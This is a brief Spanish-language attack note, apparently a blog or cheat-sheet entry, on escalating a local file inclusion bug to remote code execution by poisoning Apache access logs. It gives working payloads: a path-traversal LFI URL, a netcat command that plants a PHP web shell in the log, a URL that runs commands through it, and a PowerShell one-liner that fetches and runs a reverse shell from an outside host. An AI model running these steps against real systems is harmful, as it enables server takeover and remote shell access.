Algunas veces y por diferentes motivos puedes acceder a los logs.
Un ejemplo muy típico son los access logs via LFI. http://IP/xyz.php?page=../../../../../%20../../xampp/apache/logs/access.log%00
Puedes infectar los access logs muy fácil con nc
root@kali:~# nc -nv 10.10.10.10 80 (UNKNOWN) [10.11.1.35] 80 (http) open <?php echo shell_exec($_GET['ric']);?> HTTP/1.1 400 Bad Request
Con eso, si accedes al log con ric=command se ejecuta. Por ejemplo para ejecutar ipconfig.
http://IP/xyz.php?ric=ipconfig&page=../../../../../%20../../xampp/apache/logs/access.log%00
A partir de ahí podemos probar si tenemos powershell.
Con eso podemos bajar la reverse shell de nishang y listo 🙂
powershell.exe IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.9:8000/powershellreverse2.ps1’)